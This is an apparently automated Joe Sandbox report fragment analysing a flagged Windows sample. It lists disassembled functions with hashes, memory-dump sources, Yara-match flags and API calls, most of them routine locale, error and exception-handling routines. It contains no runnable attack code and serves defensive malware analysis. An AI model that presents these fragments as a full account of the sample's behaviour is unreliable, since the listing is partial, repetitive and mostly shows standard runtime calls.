• Associated: 00000000.00000002.1974799588.00000000001B6000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1974817710.00000000001C2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1974861913.0000000000222000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1974880869.0000000000223000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1974896688.0000000000225000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1974913124.0000000000229000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_190000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 415426439-0
                                                                                                                                                                                                                            • Opcode ID: 43cb7857c5bbbb30606c06a37dd78bd1ccb2d4733561ece971edaeb8e5a5228b
                                                                                                                                                                                                                            • Instruction ID: ab91f24a37110ecd09f2e4ef0adee7bf4937ad7e66885c6e84785a2273ebd7f1
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 43cb7857c5bbbb30606c06a37dd78bd1ccb2d4733561ece971edaeb8e5a5228b
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AD516171D00209ABDB22EFA5CC45AEFB7B8BF1C700F144569F551E7191EB70EA408B61
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 001A8DB3: GetLastError.KERNEL32(?,00000008,001A69CC), ref: 001A8DB7
                                                                                                                                                                                                                              • Part of subcall function 001A8DB3: SetLastError.KERNEL32(00000000,001C0710,00000024,0019DDA3), ref: 001A8E59
                                                                                                                                                                                                                            • GetACP.KERNEL32(?,?,?,?,?,?,001A4F88,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 001AFE50
                                                                                                                                                                                                                            • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,001A4F88,?,?,?,00000055,?,-00000050,?,?), ref: 001AFE7B
                                                                                                                                                                                                                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 001AFFDE
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1974772699.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_190000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ErrorLast$CodeInfoLocalePageValid
                                                                                                                                                                                                                            • String ID: utf8
                                                                                                                                                                                                                            • API String ID: 607553120-905460609
                                                                                                                                                                                                                            • Opcode ID: 9a3584d315ad6f64df94caaf67ded1fd81df36e0f36d39fe87e574df88664115
                                                                                                                                                                                                                            • Instruction ID: 4a88e39a5522a0a29a3ad830c47c05d5250ecaa0f5e5d5bcc8595d01fa40cd65
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9a3584d315ad6f64df94caaf67ded1fd81df36e0f36d39fe87e574df88664115
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7471047AA00206AADB25ABB4CC86BA6B3A8EF1B700F11403DF505D7191FB74ED428760
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1974772699.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_190000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: _strrchr
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3213747228-0
                                                                                                                                                                                                                            • Opcode ID: 345b19b73ae581e04342a76ae529d1a1f04ad07f21d6b651d60a02739456ec14
                                                                                                                                                                                                                            • Instruction ID: 0fbef775e9e7da18664adbefb1efe1b6255d57f6e238e56e0ded49500cb80c44
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 345b19b73ae581e04342a76ae529d1a1f04ad07f21d6b651d60a02739456ec14
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 74B14B769082459FDB158F68CC91BFEBBA5EF5A310F1581AAE815AB2C1D3349F01C7A0
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 0019A091
                                                                                                                                                                                                                            • IsDebuggerPresent.KERNEL32 ref: 0019A15D
                                                                                                                                                                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0019A176
                                                                                                                                                                                                                            • UnhandledExceptionFilter.KERNEL32(?), ref: 0019A180
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1974772699.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_190000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 254469556-0
                                                                                                                                                                                                                            • Opcode ID: adfb7e1cd21b692c857b244e3a139cf9034c76f3aabfba32c53cea0ac258a601
                                                                                                                                                                                                                            • Instruction ID: 23234def3331fcac2f13c501a3dd4852386ecc6813e7625ce343172bf7bd0869
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: adfb7e1cd21b692c857b244e3a139cf9034c76f3aabfba32c53cea0ac258a601
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F5310875D01218DBDF21EFA5D9497CDBBB8AF18300F5041AAE40DAB250EB759B84CF85
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 001A8DB3: GetLastError.KERNEL32(?,00000008,001A69CC), ref: 001A8DB7
                                                                                                                                                                                                                              • Part of subcall function 001A8DB3: SetLastError.KERNEL32(00000000,001C0710,00000024,0019DDA3), ref: 001A8E59
                                                                                                                                                                                                                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 001B01F6
                                                                                                                                                                                                                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 001B0240
                                                                                                                                                                                                                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 001B0306
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1974772699.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_190000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: InfoLocale$ErrorLast
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 661929714-0
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 001A0C61
                                                                                                                                                                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 001A0C6B
                                                                                                                                                                                                                            • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 001A0C78
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1974772699.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3906539128-0
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1974772699.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: H_prolog3_catch
                                                                                                                                                                                                                            • String ID: ios base: %i
                                                                                                                                                                                                                            • API String ID: 3886170330-1055636949
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1974772699.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1974817710.00000000001C2000.00000004.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID: /$UT
                                                                                                                                                                                                                            • API String ID: 0-1626504983
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1974817710.00000000001C2000.00000004.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID: ``C$x`C
                                                                                                                                                                                                                            • API String ID: 0-4276601940
                                                                                                                                                                                                                            • Opcode ID: 4639c864b91f6e9cc3f469510a2f9944f86d2f54ec5b532889058d1e4e41c286
                                                                                                                                                                                                                            • Instruction ID: d5db94c406cbe5f8e59c8aa148a6e75d6ccfba4d2501855324514d9ceb6c30ed
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4639c864b91f6e9cc3f469510a2f9944f86d2f54ec5b532889058d1e4e41c286
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9151A073904216DBEB18CF59C4C16E973B1EF98304F2684BAD84AAF386EB709941CB50
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 0019301A: __EH_prolog3_catch.LIBCMT ref: 00193021
                                                                                                                                                                                                                            • _Deallocate.LIBCONCRT ref: 00192E06
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1974772699.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
• Associated: 00000000.00000002.1974753956.0000000000190000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1974799588.00000000001B6000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1974817710.00000000001C2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1974861913.0000000000222000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1974880869.0000000000223000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1974896688.0000000000225000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1974913124.0000000000229000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_190000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: DeallocateH_prolog3_catch
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 20358830-0
                                                                                                                                                                                                                            • Opcode ID: b205591d52042a80474cd02ee0ade2311398e6ed513a44da6cb67509e3884182
                                                                                                                                                                                                                            • Instruction ID: dc9e537a75a7983b5e15e9f3332d7137e385db9bab74e78c598077981b62cb08
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b205591d52042a80474cd02ee0ade2311398e6ed513a44da6cb67509e3884182
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D2B1A233D10A1A5BCF1CD97989911EEFAD5EF5A320F55433BE925EB3D0D3358A028684
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,001A9437,?,?,00000008,?,?,001B4915,00000000), ref: 001A9669
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1974772699.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
• Associated: 00000000.00000002.1974753956.0000000000190000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1974799588.00000000001B6000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1974817710.00000000001C2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1974861913.0000000000222000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1974880869.0000000000223000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1974896688.0000000000225000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1974913124.0000000000229000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_190000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ExceptionRaise
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3997070919-0
                                                                                                                                                                                                                            • Opcode ID: 7dabf66aa4032aa47eea94e5e75350a1baa74933e8bf42e96a19d4e4568abc96
                                                                                                                                                                                                                            • Instruction ID: 259c13c7ac04d0f0c6dfc84042d6091618e08e8e27cf84aa7233afc9c089198a
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7dabf66aa4032aa47eea94e5e75350a1baa74933e8bf42e96a19d4e4568abc96
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D5B14E79610608DFDB19CF28C486B657BE0FF46364F258659E89ACF2A1C335E992CF40
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00199B1B
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1974772699.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
• Associated: 00000000.00000002.1974753956.0000000000190000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1974799588.00000000001B6000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1974817710.00000000001C2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1974861913.0000000000222000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1974880869.0000000000223000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1974896688.0000000000225000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1974913124.0000000000229000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_190000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: FeaturePresentProcessor
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2325560087-0
                                                                                                                                                                                                                            • Opcode ID: 04cdb33e1c61dff412cd5267bc7558a0ad123afc0a54151947beeffaf99cc606
                                                                                                                                                                                                                            • Instruction ID: da69f12f026bc9620fab8617908a9dbc70d4cb06dfdf083aa696f019d82d0c87
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 04cdb33e1c61dff412cd5267bc7558a0ad123afc0a54151947beeffaf99cc606
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 36A15AB1900605DFDB29DF58E885AAEBBF0FB48314F29856ED911EB6A0D3349981CF50
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1974772699.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
• Associated: 00000000.00000002.1974753956.0000000000190000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1974799588.00000000001B6000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1974817710.00000000001C2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1974861913.0000000000222000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1974880869.0000000000223000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1974896688.0000000000225000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1974913124.0000000000229000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_190000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: 293efe0d4a7ad2f557fb7a132399e04a00f482c7cb694968f4a868173b302c35
                                                                                                                                                                                                                            • Instruction ID: 1934a74d81d843276fdc44676e0eabd0f949e3fed7e9760290882c538c4c0e6a
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 293efe0d4a7ad2f557fb7a132399e04a00f482c7cb694968f4a868173b302c35
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9F41C4B9C0461CAFCF20DF68DC89AAABBB8EF56300F1442D9E449D3201DB309E858F10
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1974772699.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
• Associated: 00000000.00000002.1974753956.0000000000190000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1974799588.00000000001B6000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1974817710.00000000001C2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1974861913.0000000000222000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1974880869.0000000000223000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1974896688.0000000000225000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1974913124.0000000000229000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID: 0
                                                                                                                                                                                                                            • API String ID: 0-4108050209
                                                                                                                                                                                                                            • Opcode ID: 7b34ee248fed0754d8519af66273283c89f65f307f352271749f6f3daaed1215
                                                                                                                                                                                                                            • Instruction ID: 5285d22116e382dad619e53dcaf43ed2b29b13b406be5ec45926e77e10cab073
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7b34ee248fed0754d8519af66273283c89f65f307f352271749f6f3daaed1215
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 40C1D234A00649AFCF29CF68C4946BEBBF1BF1A310F25462DE456D72A2C731AD46CB51
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 001A8DB3: GetLastError.KERNEL32(?,00000008,001A69CC), ref: 001A8DB7
                                                                                                                                                                                                                              • Part of subcall function 001A8DB3: SetLastError.KERNEL32(00000000,001C0710,00000024,0019DDA3), ref: 001A8E59
                                                                                                                                                                                                                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 001B0449
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1974772699.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ErrorLast$InfoLocale
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3736152602-0
                                                                                                                                                                                                                            • Opcode ID: 62a51a023d749424fdb8f312cd1ebe6900ad80b9ccc36b7da527f058863b2981
                                                                                                                                                                                                                            • Instruction ID: d6c8d0a6c791cd1b7ad46f8e9eafa894e018aac24c836269a939483180ec7018
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 62a51a023d749424fdb8f312cd1ebe6900ad80b9ccc36b7da527f058863b2981
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 22219F72A04206AFDB299B65DC42AFB73ACEF59310F10407EFA05D6181EB74ED449B50
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 001A8DB3: GetLastError.KERNEL32(?,00000008,001A69CC), ref: 001A8DB7
                                                                                                                                                                                                                              • Part of subcall function 001A8DB3: SetLastError.KERNEL32(00000000,001C0710,00000024,0019DDA3), ref: 001A8E59
                                                                                                                                                                                                                            • EnumSystemLocalesW.KERNEL32(001B01A2,00000001,00000000,?,-00000050,?,001B07D3,00000000,?,?,?,00000055,?), ref: 001B00EE
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1974772699.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2417226690-0
                                                                                                                                                                                                                            • Opcode ID: 6e5d1838826d7044e9203366a1adf96ea3d5f8c98c0acc08fa496f280985531e
                                                                                                                                                                                                                            • Instruction ID: 9016d28d7e6fed38c8975dfec27e753e118b41a653017441648500a5ffd223a6
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6e5d1838826d7044e9203366a1adf96ea3d5f8c98c0acc08fa496f280985531e
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D011E53B6007059FDB1CAF39C8916BBB792FF84358B14442DEA8687B40D771A942CB40
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 001A8DB3: GetLastError.KERNEL32(?,00000008,001A69CC), ref: 001A8DB7
                                                                                                                                                                                                                              • Part of subcall function 001A8DB3: SetLastError.KERNEL32(00000000,001C0710,00000024,0019DDA3), ref: 001A8E59
                                                                                                                                                                                                                            • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,001B03BE,00000000,00000000,?), ref: 001B0650
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1974772699.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ErrorLast$InfoLocale
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3736152602-0
                                                                                                                                                                                                                            • Opcode ID: 89e582dc9455027add66b72f6345c04536106de88f3973fecdd9d48c7181f6e3
                                                                                                                                                                                                                            • Instruction ID: c8a9cc8bfac9bbac6bdd05aa56cb87048d7b404420f0bcf8b4ea69316bad009d
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 89e582dc9455027add66b72f6345c04536106de88f3973fecdd9d48c7181f6e3
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 06F0A4B6A00211ABDB295B65CC05BFB7768EB84764F16442AEC06A3180EB74FF51CAD0
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 001A8DB3: GetLastError.KERNEL32(?,00000008,001A69CC), ref: 001A8DB7
                                                                                                                                                                                                                              • Part of subcall function 001A8DB3: SetLastError.KERNEL32(00000000,001C0710,00000024,0019DDA3), ref: 001A8E59
                                                                                                                                                                                                                            • EnumSystemLocalesW.KERNEL32(001B03F5,00000001,?,?,-00000050,?,001B0797,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 001B0161
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1974772699.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2417226690-0
                                                                                                                                                                                                                            • Opcode ID: e1a73ad0e1a5dc834723effe0505f9bd0a565237d52cd06bab887cd129c55117
                                                                                                                                                                                                                            • Instruction ID: 452a4a02d09fb015941af9861fbef346d5faa3f2b7edbbe0fc08babcfa2a2e4d
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e1a73ad0e1a5dc834723effe0505f9bd0a565237d52cd06bab887cd129c55117
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 36F0C2363043046FDB296F39D885ABB7B91EB85368F05842CFA454B6A0D7B19C41C650
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 001A0E12: EnterCriticalSection.KERNEL32(?,?,001A8A8B,?,001C07B0,00000008,001A8C4F,?,0019EE66,?), ref: 001A0E21
                                                                                                                                                                                                                            • EnumSystemLocalesW.KERNEL32(001A7019,00000001,001C0750,0000000C,001A73EB,00000000), ref: 001A705E
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1974772699.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_190000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1272433827-0
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 001A8DB3: GetLastError.KERNEL32(?,00000008,001A69CC), ref: 001A8DB7
                                                                                                                                                                                                                              • Part of subcall function 001A8DB3: SetLastError.KERNEL32(00000000,001C0710,00000024,0019DDA3), ref: 001A8E59
                                                                                                                                                                                                                            • EnumSystemLocalesW.KERNEL32(001AFF8A,00000001,?,?,?,001B07F5,-00000050,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 001B0068
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1974772699.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_190000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2417226690-0
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,001A5AEE,?,20001004,00000000,00000002,?,?,001A50F0), ref: 001A7523
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1974772699.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_190000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: InfoLocale
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2299586839-0
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • SetUnhandledExceptionFilter.KERNEL32(Function_0000A21E,00199799), ref: 0019A217
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1974772699.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_190000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3192549508-0
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1974772699.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_190000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: HeapProcess
